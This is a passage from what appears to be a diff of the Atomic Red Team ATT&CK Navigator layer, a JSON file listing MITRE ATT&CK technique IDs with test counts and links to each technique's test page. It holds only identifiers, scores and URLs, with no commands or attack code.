Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":14,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1552.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":27,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.001","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555.003","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}]},{"techniqueID":"T1559.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":111,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":49,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.003","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":28,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":3,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569.002","score":6,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]},{"techniqueID":"T1614","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1647","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1647/T1647.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file +{"name":"Atomic Red Team","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":47,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.001","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":3,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.005","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.005/T1021.005.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":3,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":10,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":8,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":51,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":67,"enabled":true,"links":[{"label":"View 